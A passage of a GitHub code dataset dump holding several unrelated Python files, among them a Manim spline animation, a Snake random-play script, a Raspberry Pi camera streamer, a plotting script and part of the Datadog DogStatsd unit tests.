xs, shape, coefs):\n return self.project(self.bases(xs), shape, coefs)\n\n def __call__(self, xs, coefs):\n return self.eval(xs, (-1, 1), coefs)\n\n\nclass BSplineRegressionExample(Scene):\n def construct(self):\n self.nknot_list = [6,8,10,12,16,20,30,40]\n self.data_files = [f'media/data/BasisSplineExample_{i}knots_60train_0.2sigma_inference_data.h5' for i in self.nknot_list]\n self.posteriors = {}\n self.data = None\n for data_file,n in zip(self.data_files,[6,8,10,12,16,20,30,40]):\n data = dd.io.load(data_file)\n self.posteriors[n] = data['samples']\n if self.data is None:\n self.data = data['data']\n self.show_data()\n self.wait(3)\n \n for n in self.nknot_list:\n self.show_posterior(n)\n self.wait(1)\n self.clear_posterior()\n \n def show_data(self):\n return\n \n def animate_spline_curve(self,dmat,cs):\n return\n \n def show_posterior(self,n,N_plot=50):\n dmat = BasisSpline(n, xrange=(-1.0,1.0)).bases(self.data['X_test']).T\n self.animate_spline_curve(dmat,cs=np.ones(dmat.shape[1]))\n for _ in range(N_plot):\n i = np.random.choice(self.posteriors[n][\"cs\"].shape[0],1)[0]\n cs = self.posteriors[n][\"cs\"][i]\n self.animate_spline_curve(dmat,cs)\n return\n \n def clear_posteror(self):\n return","repo_name":"FarrOutLab/FarrLabManimations","sub_path":"animations/BSplineInferenceExample/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18239099131","text":"import random\n\nfrom Snake import Game as game\nfrom time import sleep\nimport pygame\nfrom pygame.locals import *\n\nslowMode = True\nnumRuns = 5\n\ndef random_game():\n averageScore = 0\n for _ in range(numRuns):\n env = game()\n env.reset()\n action = -1\n\n max_moves = 69420\n\n for _ in range(max_moves):\n action = random.randrange(0, 3)\n\n if slowMode:\n sleep(0.1)\n env.render()\n\n done, score = env.step(action)\n\n if done:\n print('Score: ', score)\n averageScore += score\n break\n\n print('Average score: ', averageScore/numRuns)\n\nif __name__ == \"__main__\":\n random_game()","repo_name":"twang35/Snek","sub_path":"theSchlort/theSchlort.py","file_name":"theSchlort.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37624167185","text":"params={\n 'enc_type': 'lstm',\n 'dec_type': 'lstm',\n 'pred_linear_bias': True,\n 'nz': 16,\n 'ni': 200,\n 'enc_nh': 512,\n 'dec_nh': 512,\n 'dec_dropout_in': 0.5,\n 'dec_dropout_out': 0.5,\n 'dec_dropout': 0.5, # for unigram decoders\n 'batch_size': 64,\n 'epochs': 200,\n 'test_nepoch': 5,\n 'train_data': 'datasets/yahoo/train.txt.100k',\n 'val_data': 'datasets/yahoo/valid.txt.10k',\n 'test_data': 'datasets/yahoo/test.txt.10k',\n 'vocab_file': 'datasets/yahoo/vocab.txt',\n \"label\": True,\n}\n","repo_name":"tombosc/exps-s2svae","sub_path":"config/config_yahoo.py","file_name":"config_yahoo.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32352948011","text":"# keywordごとにstringdbのスコアの分布を見てみる\n\n# %%\nimport os\n\nimport pandas as pd\nimport seaborn as sns\nfrom dotenv import load_dotenv\n\nfrom src.plot.foldseek_stringdb_investigation.plot_utils import (\n construct_plotting_data,\n plot_boxplot_by_keyword,\n)\nfrom src.plot.interaction_metrics.representative import (\n convert_to_dict_exp_pair_by_keyword,\n target_report,\n)\nfrom src.util.similarity_strategy import (\n FoldSeekTMScore,\n Jaccard,\n Simpson,\n)\nfrom src.util.metrics import Metrics\n\nsns.set(font_scale=1.4)\n\nload_dotenv()\nPROJECT_PATH = os.environ[\"PROJECT_PATH\"]\n\nSAVEDIR = os.path.join(\n PROJECT_PATH,\n \"src/plot/img\",\n \"foldseek_stringdb_investigation\",\n \"keyword_foldseekdb\",\n)\n\nif not os.path.exists(SAVEDIR):\n os.makedirs(SAVEDIR)\n\n # %%\n\nTHRESHOLD_GENE_NUM = 1000\nBIOSAMPLE = \"HepG2\"\n\n\nreport = target_report(THRESHOLD_GENE_NUM, BIOSAMPLE)\n\ndata: pd.DataFrame = Metrics(report)(\n [\n FoldSeekTMScore(symmetric_method=\"min\"),\n FoldSeekTMScore(symmetric_method=\"max\"),\n FoldSeekTMScore(symmetric_method=\"average\"),\n Simpson(),\n Jaccard(),\n ],\n) # type: ignore\n# %%\nkeyword_experiment_pair = convert_to_dict_exp_pair_by_keyword(data)\n# %%\n\ninvestigation_metrics = [\n \"foldseek_tmscore_min\",\n \"foldseek_tmscore_max\",\n \"foldseek_tmscore_average\",\n]\nplot_data = construct_plotting_data(\n data, keyword_experiment_pair, investigation_metrics\n)\n\nfor met in investigation_metrics:\n fig = plot_boxplot_by_keyword(plot_data, met)\n fig.savefig(os.path.join(SAVEDIR, f\"boxplot_{met}.png\"), bbox_inches=\"tight\")\n\n# %%\n","repo_name":"edge2992/eCLIP_ENCODE","sub_path":"src/plot/foldseek_stringdb_investigation/keyword_foldseek.py","file_name":"keyword_foldseek.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28817182417","text":"# camera.py\nimport time\nimport io\nimport threading\nimport picamera\n\nclass Camera(object):\n thread = None\n frame = None\n last_access = 0\n camera = picamera.PiCamera()\n\n def initialize(self):\n if Camera.thread is None:\n Camera.thread = threading.Thread(target=self._thread)\n Camera.thread.start()\n\n # 프레임 생성될 때까지 대기\n while self.frame is None:\n pass\n\n def get_frame(self):\n Camera.last_access = time.time()\n self.initialize()\n return self.frame\n\n def close_cam(self):\n self.camera.close()\n\n @classmethod\n def _thread(cls):\n cls.camera.resolution = (320, 240)\n cls.camera.hflip = True\n cls.camera.vflip = True\n\n cls.camera.start_preview()\n cls.camera.annotate_text_size = 50\n cls.camera.annotate_text = \"Smart Farm\"\n cls.camera.annotate_foreground = picamera.Color('Green')\n\n time.sleep(2)\n\n stream = io.BytesIO()\n \n # Capture images continuously from the camera \n # as an infinite iterator.\n for foo in cls.camera.capture_continuous(stream, 'jpeg',\n use_video_port=True):\n stream.seek(0)\n cls.frame = stream.read()\n\n stream.seek(0)\n stream.truncate()\n\n # 반응 없을 경우 탈출\n if time.time() - cls.last_access > 10:\n break\n\n # 100ms 딜레이(10fps)\n time.sleep(0.1)\n\n cls.thread = None","repo_name":"1994wjdwodbs/SmartFarm_Project","sub_path":"Flask/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69875425050","text":"\"\"\" Write a program to accept a range from user and print all odd numbers in the same. Hint: Don't use any arithmatic operator.\nAccept 2 vaules. Use bitwise. Do validation for upper & lower numbers \"\"\"\n\ndef IsOdd(num):\n return ((num & 1) == 1)\n\n\"\"\" return num%2 == 1 \"\"\"\n\nlb,ub = eval(input (\"Please enter two number\"))\nprint(lb,ub)\n\nif (lb < ub):\n for x in range(lb,ub):\n if IsOdd(x):\n print(\"%d is odd number\" %x)\n \nelse:\n print (\"Incorrect range\")\n \n\n","repo_name":"nmomaya/Python_Assignment","sub_path":"Assignment7_Class.py","file_name":"Assignment7_Class.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47763740204","text":"from collections import deque\nfrom contextlib import closing\nfrom threading import Thread\nimport errno\nimport os\nimport shutil\nimport socket\nimport tempfile\nimport threading\nimport time\nimport unittest\nimport warnings\n\n# Third-party libraries\nimport mock\nfrom mock import call, Mock, mock_open, patch\nimport pytest\n\n# Datadog libraries\nfrom datadog import initialize, statsd\nfrom datadog import __version__ as version\nfrom datadog.dogstatsd.base import DEFAULT_FLUSH_INTERVAL, DogStatsd, MIN_SEND_BUFFER_SIZE, UDP_OPTIMAL_PAYLOAD_LENGTH, UDS_OPTIMAL_PAYLOAD_LENGTH\nfrom datadog.dogstatsd.context import TimedContextManagerDecorator\nfrom datadog.util.compat import is_higher_py35, is_p3k\nfrom tests.util.contextmanagers import preserve_environment_variable, EnvVars\nfrom tests.unit.dogstatsd.fixtures import load_fixtures\n\n\nclass FakeSocket(object):\n \"\"\" A fake socket for testing. \"\"\"\n\n FLUSH_GRACE_PERIOD = 0.2\n\n def __init__(self, flush_interval=DEFAULT_FLUSH_INTERVAL):\n self.payloads = deque()\n\n self._flush_interval = flush_interval\n self._flush_wait = False\n self.timeout = () # unit tuple = settimeout was not called\n\n def send(self, payload):\n if is_p3k():\n assert isinstance(payload, bytes)\n else:\n assert isinstance(payload, str)\n\n self.payloads.append(payload)\n\n def recv(self, count=1, reset_wait=False, no_wait=False):\n # Initial receive should wait for the flush thread timeout unless we\n # specifically want either a follow-up wait or no waiting at all\n if not self._flush_wait or reset_wait:\n if not no_wait:\n time.sleep(self._flush_interval+self.FLUSH_GRACE_PERIOD)\n self._flush_wait = True\n\n if count > len(self.payloads):\n return None\n\n out = []\n for _ in range(count):\n out.append(self.payloads.popleft().decode('utf-8'))\n return '\\n'.join(out)\n\n def close(self):\n pass\n\n def __repr__(self):\n return str(self.payloads)\n\n def settimeout(self, timeout):\n self.timeout = timeout\n\nclass BrokenSocket(FakeSocket):\n def __init__(self, error_number=None):\n super(BrokenSocket, self).__init__()\n\n self.error_number = error_number\n\n def send(self, payload):\n error = socket.error(\"Socket error [Errno {}]\".format(self.error_number))\n if self.error_number:\n error.errno = self.error_number\n\n raise error\n\n\nclass OverflownSocket(BrokenSocket):\n\n def __init__(self):\n super(OverflownSocket, self).__init__(errno.EAGAIN)\n\n\ndef telemetry_metrics(metrics=1, events=0, service_checks=0, bytes_sent=0, bytes_dropped_writer=0, packets_sent=1, packets_dropped_writer=0, transport=\"udp\", tags=\"\", bytes_dropped_queue=0, packets_dropped_queue=0):\n tags = \",\" + tags if tags else \"\"\n\n return \"\\n\".join([\n \"datadog.dogstatsd.client.metrics:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(metrics, version, transport, tags),\n \"datadog.dogstatsd.client.events:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(events, version, transport, tags),\n \"datadog.dogstatsd.client.service_checks:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(service_checks, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_sent:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_sent, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_dropped:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_dropped_queue + bytes_dropped_writer, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_dropped_queue:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_dropped_queue, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_dropped_writer:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_dropped_writer, version, transport, tags),\n \"datadog.dogstatsd.client.packets_sent:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_sent, version, transport, tags),\n \"datadog.dogstatsd.client.packets_dropped:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_dropped_queue + packets_dropped_writer, version, transport, tags),\n \"datadog.dogstatsd.client.packets_dropped_queue:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_dropped_queue, version, transport, tags),\n \"datadog.dogstatsd.client.packets_dropped_writer:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_dropped_writer, version, transport, tags),\n ]) + \"\\n\"\n\n\nclass TestDogStatsd(unittest.TestCase):\n METRIC_TYPE_MAP = {\n 'gauge': { 'id': 'g' },\n 'timing': { 'id': 'ms' },\n }\n\n def setUp(self):\n \"\"\"\n Set up a default Dogstatsd instance and mock the proc filesystem.\n \"\"\"\n #\n self.statsd = DogStatsd(telemetry_min_flush_interval=0)\n self.statsd.socket = FakeSocket()\n self.statsd._reset_telemetry()\n\n # Mock the proc filesystem\n route_data = load_fixtures('route')\n self._procfs_mock = patch('datadog.util.compat.builtins.open', mock_open())\n self._procfs_mock.start().return_value.readlines.return_value = route_data.split(\"\\n\")\n\n def tearDown(self):\n \"\"\"\n Unmock the proc filesystem.\n \"\"\"\n self._procfs_mock.stop()\n\n def assert_equal_telemetry(self, expected_payload, actual_payload, telemetry=None):\n if telemetry is None:\n telemetry = telemetry_metrics(bytes_sent=len(expected_payload))\n\n if expected_payload:\n expected_payload = \"\\n\".join([expected_payload, telemetry])\n else:\n expected_payload = telemetry\n\n self.maxDiff = None\n return self.assertEqual(expected_payload, actual_payload)\n\n def send_and_assert(\n self,\n dogstatsd,\n expected_metrics,\n last_telemetry_size=0,\n buffered=False,\n ):\n \"\"\"\n Send and then asserts that a chain of metrics arrive in the right order\n and with expected telemetry values.\n \"\"\"\n\n expected_messages = []\n for metric_type, metric_name, metric_value in expected_metrics:\n # Construct the expected message data\n metric_type_id = TestDogStatsd.METRIC_TYPE_MAP[metric_type]['id']\n expected_messages.append(\n \"{}:{}|{}\\n\".format(metric_name, metric_value, metric_type_id)\n )\n\n # Send the value\n getattr(dogstatsd, metric_type)(metric_name, metric_value)\n\n # Sanity check\n if buffered:\n # Ensure that packets didn't arrive immediately if we are expecting\n # buffering behavior\n self.assertIsNone(dogstatsd.socket.recv(2, no_wait=True))\n\n metrics = 1\n if buffered:\n metrics = len(expected_messages)\n\n if buffered:\n expected_messages = [ ''.join(expected_messages) ]\n\n for message in expected_messages:\n packets_sent = 1\n # For all ono-initial packets, our current telemetry stats will\n # contain the metadata for the last telemetry packet as well.\n if last_telemetry_size > 0:\n packets_sent += 1\n\n expected_metrics=telemetry_metrics(\n metrics=metrics,\n packets_sent=packets_sent,\n bytes_sent=len(message) + last_telemetry_size\n )\n self.assert_equal_telemetry(\n message,\n dogstatsd.socket.recv(2, no_wait=not buffered, reset_wait=True),\n telemetry=expected_metrics,\n )\n last_telemetry_size = len(expected_metrics)\n\n return last_telemetry_size\n\n def assert_almost_equal(self, val1, val2, delta):\n \"\"\"\n Calculates a delta between first and second value and ensures\n that this difference falls within the delta range\n \"\"\"\n return self.assertTrue(\n 0 <= abs(val1 - val2) <= delta,\n \"Absolute difference of {} and {} ({}) is not within {}\".format(\n val1,\n val2,\n abs(val1-val2),\n delta,\n ),\n )\n\n def recv(self, *args, **kwargs):\n return self.statsd.socket.recv(*args, **kwargs)\n\n def test_initialization(self):\n \"\"\"\n `initialize` overrides `statsd` default instance attributes.\n \"\"\"\n options = {\n 'statsd_host': \"myhost\",\n 'statsd_port': 1234\n }\n\n # Default values\n self.assertEqual(statsd.host, \"localhost\")\n self.assertEqual(statsd.port, 8125)\n\n # After initialization\n initialize(**options)\n self.assertEqual(statsd.host, \"myhost\")\n self.assertEqual(statsd.port, 1234)\n\n # Add namespace\n options['statsd_namespace'] = \"mynamespace\"\n initialize(**options)\n self.assertEqual(statsd.host, \"myhost\")\n self.assertEqual(statsd.port, 1234)\n self.assertEqual(statsd.namespace, \"mynamespace\")\n\n # Set `statsd` host to the system's default route\n initialize(statsd_use_default_route=True, **options)\n self.assertEqual(statsd.host, \"172.17.0.1\")\n self.assertEqual(statsd.port, 1234)\n\n # Add UNIX socket\n options['statsd_socket_path'] = '/var/run/dogstatsd.sock'\n initialize(**options)\n self.assertEqual(statsd.socket_path, options['statsd_socket_path'])\n self.assertIsNone(statsd.host)\n self.assertIsNone(statsd.port)\n\n def test_dogstatsd_initialization_with_env_vars(self):\n \"\"\"\n Dogstatsd can retrieve its config from env vars when\n not provided in constructor.\n \"\"\"\n # Setup\n with preserve_environment_variable('DD_AGENT_HOST'):\n os.environ['DD_AGENT_HOST'] = 'myenvvarhost'\n with preserve_environment_variable('DD_DOGSTATSD_PORT'):\n os.environ['DD_DOGSTATSD_PORT'] = '4321'\n dogstatsd = DogStatsd()\n\n # Assert\n self.assertEqual(dogstatsd.host, \"myenvvarhost\")\n self.assertEqual(dogstatsd.port, 4321)\n\n def test_default_route(self):\n \"\"\"\n Dogstatsd host can be dynamically set to the default route.\n \"\"\"\n self.assertEqual(\n DogStatsd(use_default_route=True).host,\n \"172.17.0.1\"\n )\n\n def test_set(self):\n self.statsd.set('set', 123)\n self.assert_equal_telemetry('set:123|s\\n', self.recv(2))\n\n def test_gauge(self):\n self.statsd.gauge('gauge', 123.4)\n self.assert_equal_telemetry('gauge:123.4|g\\n', self.recv(2))\n\n def test_counter(self):\n self.statsd.increment('page.views')\n self.statsd.flush()\n self.assert_equal_telemetry('page.views:1|c\\n', self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.increment('page.views', 11)\n self.statsd.flush()\n self.assert_equal_telemetry('page.views:11|c\\n', self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.decrement('page.views')\n self.statsd.flush()\n self.assert_equal_telemetry('page.views:-1|c\\n', self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.decrement('page.views', 12)\n self.statsd.flush()\n self.assert_equal_telemetry('page.views:-12|c\\n', self.recv(2))\n\n def test_histogram(self):\n self.statsd.histogram('histo', 123.4)\n self.assert_equal_telemetry('histo:123.4|h\\n', self.recv(2))\n\n def test_pipe_in_tags(self):\n self.statsd.gauge('gt', 123.4, tags=['pipe|in:tag', 'red'])\n self.assert_equal_telemetry('gt:123.4|g|#pipe_in:tag,red\\n', self.recv(2))\n\n def test_tagged_gauge(self):\n self.statsd.gauge('gt', 123.4, tags=['country:china', 'age:45', 'blue'])\n self.assert_equal_telemetry('gt:123.4|g|#country:china,age:45,blue\\n', self.recv(2))\n\n def test_tagged_counter(self):\n self.statsd.increment('ct', tags=[u'country:españa', 'red'])\n self.assert_equal_telemetry(u'ct:1|c|#country:españa,red\\n', self.recv(2))\n\n def test_tagged_histogram(self):\n self.statsd.histogram('h', 1, tags=['red'])\n self.assert_equal_telemetry('h:1|h|#red\\n', self.recv(2))\n\n def test_sample_rate(self):\n # Disabling telemetry since sample_rate imply randomness\n self.statsd._telemetry = False\n\n self.statsd.increment('c', sample_rate=0)\n self.assertFalse(self.recv())\n\n for _ in range(10000):\n self.statsd.increment('sampled_counter', sample_rate=0.3)\n\n self.statsd.flush()\n\n total_metrics = 0\n payload = self.recv()\n while payload:\n metrics = payload.rstrip('\\n').split('\\n')\n for metric in metrics:\n self.assertEqual('sampled_counter:1|c|@0.3', metric)\n total_metrics += len(metrics)\n payload = self.recv()\n\n self.assert_almost_equal(3000, total_metrics, 150)\n\n def test_default_sample_rate(self):\n # Disabling telemetry since sample_rate imply randomness\n self.statsd._telemetry = False\n\n self.statsd.default_sample_rate = 0.3\n for _ in range(10000):\n self.statsd.increment('sampled_counter')\n\n total_metrics = 0\n payload = self.recv()\n while payload:\n metrics = payload.rstrip('\\n').split('\\n')\n for metric in metrics:\n self.assertEqual('sampled_counter:1|c|@0.3', metric)\n\n total_metrics += len(metrics)\n payload = self.recv()\n\n self.assert_almost_equal(3000, total_metrics, 150)\n\n def test_tags_and_samples(self):\n # Disabling telemetry since sample_rate imply randomness\n self.statsd._telemetry = False\n\n for _ in range(100):\n self.statsd.gauge('gst', 23, tags=[\"sampled\"], sample_rate=0.9)\n\n self.assertEqual('gst:23|g|@0.9|#sampled', self.recv().split('\\n')[0])\n\n def test_timing(self):\n self.statsd.timing('t', 123)\n self.assert_equal_telemetry('t:123|ms\\n', self.recv(2))\n\n def test_event(self):\n self.statsd.event(\n 'Title',\n u'L1\\nL2',\n priority='low',\n date_happened=1375296969,\n )\n event2 = u'_e{5,6}:Title|L1\\\\nL2|d:1375296969|p:low\\n'\n self.assert_equal_telemetry(\n event2,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event2),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.event('Title', u'♬ †øU †øU ¥ºu T0µ ♪',\n aggregation_key='key', tags=['t1', 't2:v2'])\n event3 = u'_e{5,32}:Title|♬ †øU †øU ¥ºu T0µ ♪|k:key|#t1,t2:v2\\n'\n self.assert_equal_telemetry(\n event3,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event3),\n ),\n )\n\n def test_unicode_event(self):\n self.statsd.event(\n 'my.prefix.Delivery - Daily Settlement Summary Report Delivery — Invoice Cloud succeeded',\n 'Delivered — destination.csv')\n event = u'_e{89,29}:my.prefix.Delivery - Daily Settlement Summary Report Delivery — Invoice Cloud succeeded|' + \\\n u'Delivered — destination.csv\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n # Positional arg names should match threadstats\n def test_event_matching_signature(self):\n self.statsd.event(title=\"foo\", message=\"bar1\")\n event = u'_e{3,4}:foo|bar1\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n def test_event_constant_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n self.statsd.event('Title', u'L1\\nL2', priority='low', date_happened=1375296969)\n event = u'_e{5,6}:Title|L1\\\\nL2|d:1375296969|p:low|#bar:baz,foo\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(event),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.event('Title', u'♬ †øU †øU ¥ºu T0µ ♪',\n aggregation_key='key', tags=['t1', 't2:v2'])\n event = u'_e{5,32}:Title|♬ †øU †øU ¥ºu T0µ ♪|k:key|#t1,t2:v2,bar:baz,foo\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(event),\n ),\n )\n\n def test_event_payload_error(self):\n def func():\n # define an event payload that is > 8 * 1024\n message = [\"l\" for i in range(8 * 1024)]\n message = \"\".join(message)\n payload = {\"title\": \"title\", \"message\": message}\n\n self.statsd.event(**payload)\n\n # check that the method fails when the payload is too large\n with pytest.raises(ValueError):\n func()\n\n # check that the method does not fail with a small payload\n self.statsd.event(\"title\", \"message\")\n\n\n def test_service_check(self):\n now = int(time.time())\n self.statsd.service_check(\n 'my_check.name', self.statsd.WARNING,\n tags=['key1:val1', 'key2:val2'], timestamp=now,\n hostname='i-abcd1234', message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\")\n check = u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#key1:val1,key2:val2|m:{2}'.format(self.statsd.WARNING, now, u'♬ †øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪\\n')\n self.assert_equal_telemetry(\n check,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n bytes_sent=len(check),\n ),\n )\n\n def test_service_check_constant_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n now = int(time.time())\n self.statsd.service_check(\n 'my_check.name', self.statsd.WARNING,\n timestamp=now,\n hostname='i-abcd1234', message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\")\n check = u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#bar:baz,foo|m:{2}'.format(self.statsd.WARNING, now, u\"♬ †øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪\\n\")\n self.assert_equal_telemetry(\n check,\n self.recv(2, True),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(check),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.service_check(\n 'my_check.name', self.statsd.WARNING,\n tags=['key1:val1', 'key2:val2'], timestamp=now,\n hostname='i-abcd1234', message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\")\n check = u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#key1:val1,key2:val2,bar:baz,foo|m:{2}'.format(self.statsd.WARNING, now, u\"♬ †øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪\\n\")\n self.assert_equal_telemetry(\n check,\n self.recv(2, True),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(check),\n ),\n )\n\n def test_metric_namespace(self):\n \"\"\"\n Namespace prefixes all metric names.\n \"\"\"\n self.statsd.namespace = \"foo\"\n self.statsd.gauge('gauge', 123.4)\n self.assert_equal_telemetry('foo.gauge:123.4|g\\n', self.recv(2))\n\n # Test Client level content tags\n def test_gauge_constant_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n self.statsd.gauge('gauge', 123.4)\n metric = 'gauge:123.4|g|#bar:baz,foo\\n'\n self.assert_equal_telemetry(metric, self.recv(2), telemetry=telemetry_metrics(tags=\"bar:baz,foo\", bytes_sent=len(metric)))\n\n def test_counter_constant_tag_with_metric_level_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n self.statsd.increment('page.views', tags=['extra'])\n metric = 'page.views:1|c|#extra,bar:baz,foo\\n'\n self.assert_equal_telemetry(metric, self.recv(2), telemetry=telemetry_metrics(tags=\"bar:baz,foo\", bytes_sent=len(metric)))\n\n def test_gauge_constant_tags_with_metric_level_tags_twice(self):\n metric_level_tag = ['foo:bar']\n self.statsd.constant_tags = ['bar:baz']\n self.statsd.gauge('gauge', 123.4, tags=metric_level_tag)\n metric = 'gauge:123.4|g|#foo:bar,bar:baz\\n'\n self.assert_equal_telemetry(\n metric,\n self.recv(2),\n telemetry=telemetry_metrics(\n tags=\"bar:baz\",\n bytes_sent=len(metric),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n # sending metrics multiple times with same metric-level tags\n # should not duplicate the tags being sent\n self.statsd.gauge('gauge', 123.4, tags=metric_level_tag)\n metric = 'gauge:123.4|g|#foo:bar,bar:baz\\n'\n self.assert_equal_telemetry(\n metric,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n tags=\"bar:baz\",\n bytes_sent=len(metric),\n ),\n )\n\n def test_socket_error(self):\n self.statsd.socket = BrokenSocket()\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n mock_log.warning.assert_called_once_with(\n \"Error submitting packet: %s, dropping the packet and closing the socket\",\n mock.ANY,\n )\n\n def test_socket_overflown(self):\n self.statsd.socket = OverflownSocket()\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n calls = [call(\"Socket send would block: %s, dropping the packet\", mock.ANY)]\n mock_log.debug.assert_has_calls(calls * 2)\n\n def test_socket_message_too_long(self):\n self.statsd.socket = BrokenSocket(error_number=errno.EMSGSIZE)\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n calls = [\n call(\n \"Packet size too big (size: %d): %s, dropping the packet\",\n mock.ANY,\n mock.ANY,\n ),\n ]\n mock_log.debug.assert_has_calls(calls * 2)\n\n def test_socket_no_buffer_space(self):\n self.statsd.socket = BrokenSocket(error_number=errno.ENOBUFS)\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n calls = [call(\"Socket buffer full: %s, dropping the packet\", mock.ANY)]\n mock_log.debug.assert_has_calls(calls * 2)\n\n @patch('socket.socket')\n def test_uds_socket_ensures_min_receive_buffer(self, mock_socket_create):\n mock_socket = mock_socket_create.return_value\n mock_socket.setblocking.return_value = None\n mock_socket.connect.return_value = None\n mock_socket.getsockopt.return_value = MIN_SEND_BUFFER_SIZE / 2\n\n datadog = DogStatsd(socket_path=\"/fake/uds/socket/path\")\n datadog.gauge('some value', 1)\n datadog.flush()\n\n # Sanity check\n mock_socket_create.assert_called_once_with(socket.AF_UNIX, socket.SOCK_DGRAM)\n\n mock_socket.setsockopt.assert_called_once_with(\n socket.SOL_SOCKET,\n socket.SO_SNDBUF,\n MIN_SEND_BUFFER_SIZE,\n )\n\n @patch('socket.socket')\n def test_udp_socket_ensures_min_receive_buffer(self, mock_socket_create):\n mock_socket = mock_socket_create.return_value\n mock_socket.setblocking.return_value = None\n mock_socket.connect.return_value = None\n mock_socket.getsockopt.return_value = MIN_SEND_BUFFER_SIZE / 2\n\n datadog = DogStatsd()\n datadog.gauge('some value', 1)\n datadog.flush()\n\n # Sanity check\n mock_socket_create.assert_called_once_with(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\n mock_socket.setsockopt.assert_called_once_with(\n socket.SOL_SOCKET,\n socket.SO_SNDBUF,\n MIN_SEND_BUFFER_SIZE,\n )\n\n def test_distributed(self):\n \"\"\"\n Measure the distribution of a function's run time using distribution custom metric.\n \"\"\"\n # In seconds\n @self.statsd.distributed('distributed.test')\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.1)\n return (arg1, arg2, kwarg1, kwarg2)\n\n self.assertEqual('func', func.__name__)\n self.assertEqual('docstring', func.__doc__)\n\n result = func(1, 2, kwarg2=3)\n # Assert it handles args and kwargs correctly.\n self.assertEqual(result, (1, 2, 1, 3))\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = 